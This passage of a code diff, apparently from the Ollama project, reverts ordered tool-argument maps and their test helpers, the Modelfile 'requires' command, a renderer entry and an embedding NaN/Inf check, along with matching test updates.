Arguments: testArgs(map[string]any{"location": "San Francisco"}), Arguments: map[string]any{"location": "San Francisco"},
}, },
}, },
}, },

View File

@ -96,7 +96,7 @@ func (r *Qwen3CoderRenderer) Render(messages []api.Message, tools []api.Tool, _
} }
sb.WriteString("\n<parameters>") sb.WriteString("\n<parameters>")
for name, prop := range tool.Function.Parameters.Properties.All() { for name, prop := range tool.Function.Parameters.Properties {
sb.WriteString("\n<parameter>") sb.WriteString("\n<parameter>")
sb.WriteString("\n<name>" + name + "</name>") sb.WriteString("\n<name>" + name + "</name>")
@ -147,7 +147,7 @@ func (r *Qwen3CoderRenderer) Render(messages []api.Message, tools []api.Tool, _
} }
for _, toolCall := range message.ToolCalls { for _, toolCall := range message.ToolCalls {
sb.WriteString("\n<tool_call>\n<function=" + toolCall.Function.Name + ">") sb.WriteString("\n<tool_call>\n<function=" + toolCall.Function.Name + ">")
for name, value := range toolCall.Function.Arguments.All() { for name, value := range toolCall.Function.Arguments {
valueStr := formatToolCallArgument(value) valueStr := formatToolCallArgument(value)
sb.WriteString("\n<parameter=" + name + ">\n" + valueStr + "\n</parameter>") sb.WriteString("\n<parameter=" + name + ">\n" + valueStr + "\n</parameter>")
} }

View File

@ -39,9 +39,9 @@ Hello, how are you?<|im_end|>
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"unit": "fahrenheit", "unit": "fahrenheit",
}), },
}, },
}, },
}, },
@ -55,7 +55,7 @@ Hello, how are you?<|im_end|>
Description: "Get the current weather in a given location", Description: "Get the current weather in a given location",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Required: []string{"unit"}, Required: []string{"unit"},
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"unit": {Type: api.PropertyType{"string"}, Enum: []any{"celsius", "fahrenheit"}, Description: "The unit of temperature"}, "unit": {Type: api.PropertyType{"string"}, Enum: []any{"celsius", "fahrenheit"}, Description: "The unit of temperature"},
// TODO(drifkin): add multiple params back once we have predictable // TODO(drifkin): add multiple params back once we have predictable
// order via some sort of ordered map type (see // order via some sort of ordered map type (see
@ -63,7 +63,7 @@ Hello, how are you?<|im_end|>
/* /*
"location": {Type: api.PropertyType{"string"}, Description: "The city and state, e.g. San Francisco, CA"}, "location": {Type: api.PropertyType{"string"}, Description: "The city and state, e.g. San Francisco, CA"},
*/ */
}), },
}, },
}}, }},
}, },
@ -140,19 +140,19 @@ That sounds nice! What about New York?<|im_end|>
{Role: "system", Content: "You are a helpful assistant with access to tools."}, {Role: "system", Content: "You are a helpful assistant with access to tools."},
{Role: "user", Content: "call double(1) and triple(2)"}, {Role: "user", Content: "call double(1) and triple(2)"},
{Role: "assistant", Content: "I'll call double(1) and triple(2) for you.", ToolCalls: []api.ToolCall{ {Role: "assistant", Content: "I'll call double(1) and triple(2) for you.", ToolCalls: []api.ToolCall{
{Function: api.ToolCallFunction{Name: "double", Arguments: testArgs(map[string]any{"number": "1"})}}, {Function: api.ToolCallFunction{Name: "double", Arguments: map[string]any{"number": "1"}}},
{Function: api.ToolCallFunction{Name: "triple", Arguments: testArgs(map[string]any{"number": "2"})}}, {Function: api.ToolCallFunction{Name: "triple", Arguments: map[string]any{"number": "2"}}},
}}, }},
{Role: "tool", Content: "{\"number\": 2}", ToolName: "double"}, {Role: "tool", Content: "{\"number\": 2}", ToolName: "double"},
{Role: "tool", Content: "{\"number\": 6}", ToolName: "triple"}, {Role: "tool", Content: "{\"number\": 6}", ToolName: "triple"},
}, },
tools: []api.Tool{ tools: []api.Tool{
{Function: api.ToolFunction{Name: "double", Description: "Double a number", Parameters: api.ToolFunctionParameters{Properties: testPropsMap(map[string]api.ToolProperty{ {Function: api.ToolFunction{Name: "double", Description: "Double a number", Parameters: api.ToolFunctionParameters{Properties: map[string]api.ToolProperty{
"number": {Type: api.PropertyType{"string"}, Description: "The number to double"}, "number": {Type: api.PropertyType{"string"}, Description: "The number to double"},
})}}}, }}}},
{Function: api.ToolFunction{Name: "triple", Description: "Triple a number", Parameters: api.ToolFunctionParameters{Properties: testPropsMap(map[string]api.ToolProperty{ {Function: api.ToolFunction{Name: "triple", Description: "Triple a number", Parameters: api.ToolFunctionParameters{Properties: map[string]api.ToolProperty{
"number": {Type: api.PropertyType{"string"}, Description: "The number to triple"}, "number": {Type: api.PropertyType{"string"}, Description: "The number to triple"},
})}}}, }}}},
}, },
expected: `<|im_start|>system expected: `<|im_start|>system
You are a helpful assistant with access to tools. You are a helpful assistant with access to tools.
@ -259,9 +259,9 @@ I'll tell you something interesting about cats`,
{Role: "assistant", ToolCalls: []api.ToolCall{ {Role: "assistant", ToolCalls: []api.ToolCall{
{Function: api.ToolCallFunction{ {Function: api.ToolCallFunction{
Name: "echo", Name: "echo",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"payload": map[string]any{"foo": "bar"}, "payload": map[string]any{"foo": "bar"},
}), },
}}, }},
}}, }},
{Role: "tool", Content: "{\"payload\": {\"foo\": \"bar\"}}", ToolName: "echo"}, {Role: "tool", Content: "{\"payload\": {\"foo\": \"bar\"}}", ToolName: "echo"},

View File

@ -337,7 +337,7 @@ Let me analyze this image.`,
Role: "assistant", Role: "assistant",
Content: "I'll check.", Content: "I'll check.",
ToolCalls: []api.ToolCall{ ToolCalls: []api.ToolCall{
{Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: testArgsOrdered([]orderedArg{{"location", "Paris"}, {"unit", "celsius"}})}}, {Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: map[string]any{"location": "Paris", "unit": "celsius"}}},
}, },
}, },
{Role: "user", Content: "<tool_response>\n18\n</tool_response>"}, {Role: "user", Content: "<tool_response>\n18\n</tool_response>"},
@ -367,8 +367,8 @@ Thanks!<|im_end|>
Role: "assistant", Role: "assistant",
Content: "before", Content: "before",
ToolCalls: []api.ToolCall{ ToolCalls: []api.ToolCall{
{Function: api.ToolCallFunction{Name: "add", Arguments: testArgsOrdered([]orderedArg{{"a", 2}, {"b", 3}})}}, {Function: api.ToolCallFunction{Name: "add", Arguments: map[string]any{"a": 2, "b": 3}}},
{Function: api.ToolCallFunction{Name: "mul", Arguments: testArgsOrdered([]orderedArg{{"x", 4}, {"y", 5}})}}, {Function: api.ToolCallFunction{Name: "mul", Arguments: map[string]any{"x": 4, "y": 5}}},
}, },
}, },
}, },
@ -387,7 +387,7 @@ before
name: "consecutive tool responses grouped", name: "consecutive tool responses grouped",
msgs: []api.Message{ msgs: []api.Message{
{Role: "user", Content: "Compute results"}, {Role: "user", Content: "Compute results"},
{Role: "assistant", Content: "ok", ToolCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "job", Arguments: testArgs(map[string]any{"n": 1})}}}}, {Role: "assistant", Content: "ok", ToolCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "job", Arguments: map[string]any{"n": 1}}}}},
{Role: "tool", Content: "5", ToolName: "job"}, {Role: "tool", Content: "5", ToolName: "job"},
{Role: "tool", Content: "6", ToolName: "job"}, {Role: "tool", Content: "6", ToolName: "job"},
}, },
@ -412,7 +412,7 @@ ok
name: "last message is tool then prefill", name: "last message is tool then prefill",
msgs: []api.Message{ msgs: []api.Message{
{Role: "user", Content: "run"}, {Role: "user", Content: "run"},
{Role: "assistant", Content: "ok", ToolCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "exec", Arguments: testArgs(map[string]any{"cmd": "ls"})}}}}, {Role: "assistant", Content: "ok", ToolCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "exec", Arguments: map[string]any{"cmd": "ls"}}}}},
{Role: "tool", Content: "done", ToolName: "exec"}, {Role: "tool", Content: "done", ToolName: "exec"},
}, },
expected: `<|im_start|>user expected: `<|im_start|>user
@ -447,7 +447,7 @@ done
Role: "assistant", Role: "assistant",
Content: "I'll check.", Content: "I'll check.",
ToolCalls: []api.ToolCall{ ToolCalls: []api.ToolCall{
{Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: testArgsOrdered([]orderedArg{{"location", "Paris"}, {"unit", "celsius"}})}}, {Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: map[string]any{"location": "Paris", "unit": "celsius"}}},
}, },
}, },
{Role: "user", Content: "<tool_response>\n18\n</tool_response>"}, {Role: "user", Content: "<tool_response>\n18\n</tool_response>"},
@ -477,7 +477,7 @@ Thanks!<|im_end|>
Role: "assistant", Role: "assistant",
Content: "I'll check.", Content: "I'll check.",
ToolCalls: []api.ToolCall{ ToolCalls: []api.ToolCall{
{Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: testArgsOrdered([]orderedArg{{"location", "Paris"}, {"unit", "celsius"}})}}, {Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: map[string]any{"location": "Paris", "unit": "celsius"}}},
}, },
}, },
{Role: "user", Content: "\n\n\n\n<tool_response>\n18\n</tool_response> extra\n\n\n\n\n\n"}, {Role: "user", Content: "\n\n\n\n<tool_response>\n18\n</tool_response> extra\n\n\n\n\n\n"},

View File

@ -128,10 +128,10 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
// { // {
// Function: api.ToolCallFunction{ // Function: api.ToolCallFunction{
// Name: "get-current-weather", // Name: "get-current-weather",
// Arguments: testArgs(map[string]any{ // Arguments: map[string]any{
// "location": "New York", // "location": "New York",
// "unit": "fahrenheit", // "unit": "fahrenheit",
// }), // },
// }, // },
// }, // },
// }, // },
@ -148,7 +148,7 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
// Parameters: api.ToolFunctionParameters{ // Parameters: api.ToolFunctionParameters{
// Type: "object", // Type: "object",
// Required: []string{"location"}, // Required: []string{"location"},
// Properties: testPropsMap(map[string]api.ToolProperty{ // Properties: map[string]api.ToolProperty{
// "location": { // "location": {
// Type: api.PropertyType{"string"}, // Type: api.PropertyType{"string"},
// Description: "The city and state, e.g. San Francisco, CA", // Description: "The city and state, e.g. San Francisco, CA",
@ -158,7 +158,7 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
// Enum: []any{"celsius", "fahrenheit"}, // Enum: []any{"celsius", "fahrenheit"},
// Description: "The temperature unit", // Description: "The temperature unit",
// }, // },
// }), // },
// }, // },
// }, // },
// }, // },
@ -216,19 +216,19 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
// { // {
// Function: api.ToolCallFunction{ // Function: api.ToolCallFunction{
// Name: "add", // Name: "add",
// Arguments: testArgs(map[string]any{ // Arguments: map[string]any{
// "a": 2, // "a": 2,
// "b": 3, // "b": 3,
// }), // },
// }, // },
// }, // },
// { // {
// Function: api.ToolCallFunction{ // Function: api.ToolCallFunction{
// Name: "multiply", // Name: "multiply",
// Arguments: testArgs(map[string]any{ // Arguments: map[string]any{
// "x": 4, // "x": 4,
// "y": 5, // "y": 5,
// }), // },
// }, // },
// }, // },
// }, // },
@ -257,10 +257,10 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
// Parameters: api.ToolFunctionParameters{ // Parameters: api.ToolFunctionParameters{
// Type: "object", // Type: "object",
// Required: []string{"a", "b"}, // Required: []string{"a", "b"},
// Properties: testPropsMap(map[string]api.ToolProperty{ // Properties: map[string]api.ToolProperty{
// "a": {Type: api.PropertyType{"integer"}, Description: "First number"}, // "a": {Type: api.PropertyType{"integer"}, Description: "First number"},
// "b": {Type: api.PropertyType{"integer"}, Description: "Second number"}, // "b": {Type: api.PropertyType{"integer"}, Description: "Second number"},
// }), // },
// }, // },
// }, // },
// }, // },
@ -272,10 +272,10 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
// Parameters: api.ToolFunctionParameters{ // Parameters: api.ToolFunctionParameters{
// Type: "object", // Type: "object",
// Required: []string{"x", "y"}, // Required: []string{"x", "y"},
// Properties: testPropsMap(map[string]api.ToolProperty{ // Properties: map[string]api.ToolProperty{
// "x": {Type: api.PropertyType{"integer"}, Description: "First factor"}, // "x": {Type: api.PropertyType{"integer"}, Description: "First factor"},
// "y": {Type: api.PropertyType{"integer"}, Description: "Second factor"}, // "y": {Type: api.PropertyType{"integer"}, Description: "Second factor"},
// }), // },
// }, // },
// }, // },
// }, // },

View File

@ -78,8 +78,6 @@ func rendererForName(name string) Renderer {
return renderer return renderer
case "nemotron-3-nano": case "nemotron-3-nano":
return &Nemotron3NanoRenderer{} return &Nemotron3NanoRenderer{}
case "functiongemma":
return &FunctionGemmaRenderer{}
default: default:
return nil return nil
} }

View File

@ -1,51 +0,0 @@
package renderers
import "github.com/ollama/ollama/api"
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved)
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
props := api.NewToolPropertiesMap()
for k, v := range m {
props.Set(k, v)
}
return props
}
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests, order not preserved)
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
args := api.NewToolCallFunctionArguments()
for k, v := range m {
args.Set(k, v)
}
return args
}
// orderedArg represents a key-value pair for ordered argument creation
type orderedArg struct {
Key string
Value any
}
// testArgsOrdered creates ToolCallFunctionArguments with a specific key order
func testArgsOrdered(pairs []orderedArg) api.ToolCallFunctionArguments {
args := api.NewToolCallFunctionArguments()
for _, p := range pairs {
args.Set(p.Key, p.Value)
}
return args
}
// orderedProp represents a key-value pair for ordered property creation
type orderedProp struct {
Key string
Value api.ToolProperty
}
// testPropsOrdered creates a ToolPropertiesMap with a specific key order
func testPropsOrdered(pairs []orderedProp) *api.ToolPropertiesMap {
props := api.NewToolPropertiesMap()
for _, p := range pairs {
props.Set(p.Key, p.Value)
}
return props
}

View File

@ -10,20 +10,6 @@ import (
"github.com/ollama/ollama/api" "github.com/ollama/ollama/api"
) )
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests)
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
args := api.NewToolCallFunctionArguments()
for k, v := range m {
args.Set(k, v)
}
return args
}
// argsComparer provides cmp options for comparing ToolCallFunctionArguments by value
var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool {
return cmp.Equal(a.ToMap(), b.ToMap())
})
const ( const (
prefix = `data:image/jpeg;base64,` prefix = `data:image/jpeg;base64,`
image = `iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=` image = `iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=`
@ -173,9 +159,9 @@ func TestToToolCallsPreservesIDs(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 2, Index: 2,
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Seattle", "location": "Seattle",
}), },
}, },
}, },
{ {
@ -183,9 +169,9 @@ func TestToToolCallsPreservesIDs(t *testing.T) {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Index: 7, Index: 7,
Name: "get_time", Name: "get_time",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"timezone": "UTC", "timezone": "UTC",
}), },
}, },
}, },
} }
@ -229,7 +215,7 @@ func TestToToolCallsPreservesIDs(t *testing.T) {
t.Errorf("tool calls mismatch (-want +got):\n%s", diff) t.Errorf("tool calls mismatch (-want +got):\n%s", diff)
} }
if diff := cmp.Diff(original, toolCalls, argsComparer); diff != "" { if diff := cmp.Diff(original, toolCalls); diff != "" {
t.Errorf("input tool calls mutated (-want +got):\n%s", diff) t.Errorf("input tool calls mutated (-want +got):\n%s", diff)
} }
} }

View File

@ -925,7 +925,7 @@ func TestResponsesStreamConverter_ToolCalls(t *testing.T) {
ID: "call_abc", ID: "call_abc",
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}), Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
}, },
}, },
}, },
@ -1800,7 +1800,7 @@ func TestResponsesStreamConverter_FunctionCallStatus(t *testing.T) {
ID: "call_abc", ID: "call_abc",
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}), Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
}, },
}, },
}, },

View File

@ -17,7 +17,6 @@ import (
"strings" "strings"
"sync" "sync"
"golang.org/x/mod/semver"
"golang.org/x/sync/errgroup" "golang.org/x/sync/errgroup"
"golang.org/x/text/encoding/unicode" "golang.org/x/text/encoding/unicode"
"golang.org/x/text/transform" "golang.org/x/text/transform"
@ -105,16 +104,6 @@ func (f Modelfile) CreateRequest(relativeDir string) (*api.CreateRequest, error)
req.Renderer = c.Args req.Renderer = c.Args
case "parser": case "parser":
req.Parser = c.Args req.Parser = c.Args
case "requires":
// golang.org/x/mod/semver requires "v" prefix
requires := c.Args
if !strings.HasPrefix(requires, "v") {
requires = "v" + requires
}
if !semver.IsValid(requires) {
return nil, fmt.Errorf("requires must be a valid semver (e.g. 0.14.0)")
}
req.Requires = strings.TrimPrefix(requires, "v")
case "message": case "message":
role, msg, _ := strings.Cut(c.Args, ": ") role, msg, _ := strings.Cut(c.Args, ": ")
messages = append(messages, api.Message{Role: role, Content: msg}) messages = append(messages, api.Message{Role: role, Content: msg})
@ -333,7 +322,7 @@ func (c Command) String() string {
switch c.Name { switch c.Name {
case "model": case "model":
fmt.Fprintf(&sb, "FROM %s", c.Args) fmt.Fprintf(&sb, "FROM %s", c.Args)
case "license", "template", "system", "adapter", "renderer", "parser", "requires": case "license", "template", "system", "adapter", "renderer", "parser":
fmt.Fprintf(&sb, "%s %s", strings.ToUpper(c.Name), quote(c.Args)) fmt.Fprintf(&sb, "%s %s", strings.ToUpper(c.Name), quote(c.Args))
case "message": case "message":
role, message, _ := strings.Cut(c.Args, ": ") role, message, _ := strings.Cut(c.Args, ": ")
@ -359,7 +348,7 @@ const (
var ( var (
errMissingFrom = errors.New("no FROM line") errMissingFrom = errors.New("no FROM line")
errInvalidMessageRole = errors.New("message role must be one of \"system\", \"user\", or \"assistant\"") errInvalidMessageRole = errors.New("message role must be one of \"system\", \"user\", or \"assistant\"")
errInvalidCommand = errors.New("command must be one of \"from\", \"license\", \"template\", \"system\", \"adapter\", \"renderer\", \"parser\", \"parameter\", \"message\", or \"requires\"") errInvalidCommand = errors.New("command must be one of \"from\", \"license\", \"template\", \"system\", \"adapter\", \"renderer\", \"parser\", \"parameter\", or \"message\"")
) )
type ParserError struct { type ParserError struct {
@ -619,7 +608,7 @@ func isValidMessageRole(role string) bool {
func isValidCommand(cmd string) bool { func isValidCommand(cmd string) bool {
switch strings.ToLower(cmd) { switch strings.ToLower(cmd) {
case "from", "license", "template", "system", "adapter", "renderer", "parser", "parameter", "message", "requires": case "from", "license", "template", "system", "adapter", "renderer", "parser", "parameter", "message":
return true return true
default: default:
return false return false

View File

@ -30,7 +30,7 @@ func (p *Prompt) placeholder() string {
} }
type Terminal struct { type Terminal struct {
reader *bufio.Reader outchan chan rune
rawmode bool rawmode bool
termios any termios any
} }
@ -264,21 +264,36 @@ func NewTerminal() (*Terminal, error) {
if err != nil { if err != nil {
return nil, err return nil, err
} }
if err := UnsetRawMode(fd, termios); err != nil {
return nil, err
}
t := &Terminal{ t := &Terminal{
reader: bufio.NewReader(os.Stdin), outchan: make(chan rune),
rawmode: true,
termios: termios,
} }
go t.ioloop()
return t, nil return t, nil
} }
func (t *Terminal) Read() (rune, error) { func (t *Terminal) ioloop() {
r, _, err := t.reader.ReadRune() buf := bufio.NewReader(os.Stdin)
if err != nil {
return 0, err for {
r, _, err := buf.ReadRune()
if err != nil {
close(t.outchan)
break
}
t.outchan <- r
} }
}
func (t *Terminal) Read() (rune, error) {
r, ok := <-t.outchan
if !ok {
return 0, io.EOF
}
return r, nil return r, nil
} }

View File

@ -61,7 +61,6 @@ func (s *Server) CreateHandler(c *gin.Context) {
config.Renderer = r.Renderer config.Renderer = r.Renderer
config.Parser = r.Parser config.Parser = r.Parser
config.Requires = r.Requires
for v := range r.Files { for v := range r.Files {
if !fs.ValidPath(v) { if !fs.ValidPath(v) {
@ -121,7 +120,7 @@ func (s *Server) CreateHandler(c *gin.Context) {
ch <- gin.H{"error": err.Error()} ch <- gin.H{"error": err.Error()}
} }
if err == nil && !remote && (config.Renderer == "" || config.Parser == "" || config.Requires == "") { if err == nil && !remote && (config.Renderer == "" || config.Parser == "") {
manifest, mErr := ParseNamedManifest(fromName) manifest, mErr := ParseNamedManifest(fromName)
if mErr == nil && manifest.Config.Digest != "" { if mErr == nil && manifest.Config.Digest != "" {
configPath, pErr := GetBlobsPath(manifest.Config.Digest) configPath, pErr := GetBlobsPath(manifest.Config.Digest)
@ -135,9 +134,6 @@ func (s *Server) CreateHandler(c *gin.Context) {
if config.Parser == "" { if config.Parser == "" {
config.Parser = baseConfig.Parser config.Parser = baseConfig.Parser
} }
if config.Requires == "" {
config.Requires = baseConfig.Requires
}
} }
cfgFile.Close() cfgFile.Close()
} }

View File

@ -752,15 +752,9 @@ func (s *Server) EmbedHandler(c *gin.Context) {
return err return err
} }
// TODO: this first normalization should be done by the model // TODO: this first normalization should be done by the model
embedding, err = normalize(embedding) embedding = normalize(embedding)
if err != nil {
return err
}
if req.Dimensions > 0 && req.Dimensions < len(embedding) { if req.Dimensions > 0 && req.Dimensions < len(embedding) {
embedding, err = normalize(embedding[:req.Dimensions]) embedding = normalize(embedding[:req.Dimensions])
if err != nil {
return err
}
} }
embeddings[i] = embedding embeddings[i] = embedding
atomic.AddUint64(&totalTokens, uint64(tokenCount)) atomic.AddUint64(&totalTokens, uint64(tokenCount))
@ -793,12 +787,9 @@ func (s *Server) EmbedHandler(c *gin.Context) {
c.JSON(http.StatusOK, resp) c.JSON(http.StatusOK, resp)
} }
func normalize(vec []float32) ([]float32, error) { func normalize(vec []float32) []float32 {
var sum float32 var sum float32
for _, v := range vec { for _, v := range vec {
if math.IsNaN(float64(v)) || math.IsInf(float64(v), 0) {
return nil, errors.New("embedding contains NaN or Inf values")
}
sum += v * v sum += v * v
} }
@ -806,7 +797,7 @@ func normalize(vec []float32) ([]float32, error) {
for i := range vec { for i := range vec {
vec[i] *= norm vec[i] *= norm
} }
return vec, nil return vec
} }
func (s *Server) EmbeddingsHandler(c *gin.Context) { func (s *Server) EmbeddingsHandler(c *gin.Context) {
@ -1115,7 +1106,6 @@ func GetModelInfo(req api.ShowRequest) (*api.ShowResponse, error) {
Messages: msgs, Messages: msgs,
Capabilities: m.Capabilities(), Capabilities: m.Capabilities(),
ModifiedAt: manifest.fi.ModTime(), ModifiedAt: manifest.fi.ModTime(),
Requires: m.Config.Requires,
} }
if m.Config.RemoteHost != "" { if m.Config.RemoteHost != "" {
@ -2404,3 +2394,4 @@ func filterThinkTags(msgs []api.Message, m *Model) []api.Message {
} }
return msgs return msgs
} }

View File

@ -22,29 +22,6 @@ import (
"github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml"
) )
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests)
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
props := api.NewToolPropertiesMap()
for k, v := range m {
props.Set(k, v)
}
return props
}
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests)
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
args := api.NewToolCallFunctionArguments()
for k, v := range m {
args.Set(k, v)
}
return args
}
// argsComparer provides cmp options for comparing ToolCallFunctionArguments by value
var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool {
return cmp.Equal(a.ToMap(), b.ToMap())
})
type mockRunner struct { type mockRunner struct {
llm.LlamaServer llm.LlamaServer
@ -511,7 +488,7 @@ func TestGenerateChat(t *testing.T) {
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Required: []string{"location"}, Required: []string{"location"},
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "The city and state", Description: "The city and state",
@ -520,7 +497,7 @@ func TestGenerateChat(t *testing.T) {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Enum: []any{"celsius", "fahrenheit"}, Enum: []any{"celsius", "fahrenheit"},
}, },
}), },
}, },
}, },
}, },
@ -582,15 +559,15 @@ func TestGenerateChat(t *testing.T) {
expectedToolCall := api.ToolCall{ expectedToolCall := api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Seattle, WA", "location": "Seattle, WA",
"unit": "celsius", "unit": "celsius",
}), },
}, },
} }
expectedToolCall.ID = gotToolCall.ID expectedToolCall.ID = gotToolCall.ID
if diff := cmp.Diff(gotToolCall, expectedToolCall, argsComparer); diff != "" { if diff := cmp.Diff(gotToolCall, expectedToolCall); diff != "" {
t.Errorf("tool call mismatch (-got +want):\n%s", diff) t.Errorf("tool call mismatch (-got +want):\n%s", diff)
} }
}) })
@ -605,7 +582,7 @@ func TestGenerateChat(t *testing.T) {
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Required: []string{"location"}, Required: []string{"location"},
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "The city and state", Description: "The city and state",
@ -614,7 +591,7 @@ func TestGenerateChat(t *testing.T) {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Enum: []any{"celsius", "fahrenheit"}, Enum: []any{"celsius", "fahrenheit"},
}, },
}), },
}, },
}, },
}, },
@ -711,10 +688,10 @@ func TestGenerateChat(t *testing.T) {
expectedToolCall := api.ToolCall{ expectedToolCall := api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Seattle, WA", "location": "Seattle, WA",
"unit": "celsius", "unit": "celsius",
}), },
}, },
} }
@ -726,7 +703,7 @@ func TestGenerateChat(t *testing.T) {
} }
expectedToolCall.ID = finalToolCall.ID expectedToolCall.ID = finalToolCall.ID
if diff := cmp.Diff(finalToolCall, expectedToolCall, argsComparer); diff != "" { if diff := cmp.Diff(finalToolCall, expectedToolCall); diff != "" {
t.Errorf("final tool call mismatch (-got +want):\n%s", diff) t.Errorf("final tool call mismatch (-got +want):\n%s", diff)
} }
}) })
@ -739,9 +716,9 @@ func TestGenerateChat(t *testing.T) {
Name: "get_weather", Name: "get_weather",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": {Type: api.PropertyType{"string"}}, "location": {Type: api.PropertyType{"string"}},
}), },
}, },
}, },
}, },

View File

@ -29,12 +29,12 @@ func getTestTools() []api.Tool {
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Required: []string{"location"}, Required: []string{"location"},
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "The city and state, e.g. San Francisco, CA", Description: "The city and state, e.g. San Francisco, CA",
}, },
}), },
}, },
}, },
}, },
@ -46,12 +46,12 @@ func getTestTools() []api.Tool {
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Required: []string{"expression"}, Required: []string{"expression"},
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"expression": { "expression": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "The mathematical expression to calculate", Description: "The mathematical expression to calculate",
}, },
}), },
}, },
}, },
}, },
@ -185,9 +185,9 @@ func TestChatHarmonyParserStreamingRealtime(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "San Francisco", "location": "San Francisco",
}), },
}, },
}, },
}, },
@ -211,9 +211,9 @@ func TestChatHarmonyParserStreamingRealtime(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "calculate", Name: "calculate",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"expression": "2+2", "expression": "2+2",
}), },
}, },
}, },
}, },

View File

@ -723,20 +723,15 @@ func TestShow(t *testing.T) {
func TestNormalize(t *testing.T) { func TestNormalize(t *testing.T) {
type testCase struct { type testCase struct {
input []float32 input []float32
expectError bool
} }
testCases := []testCase{ testCases := []testCase{
{input: []float32{1}, expectError: false}, {input: []float32{1}},
{input: []float32{0, 1, 2, 3}, expectError: false}, {input: []float32{0, 1, 2, 3}},
{input: []float32{0.1, 0.2, 0.3}, expectError: false}, {input: []float32{0.1, 0.2, 0.3}},
{input: []float32{-0.1, 0.2, 0.3, -0.4}, expectError: false}, {input: []float32{-0.1, 0.2, 0.3, -0.4}},
{input: []float32{0, 0, 0}, expectError: false}, {input: []float32{0, 0, 0}},
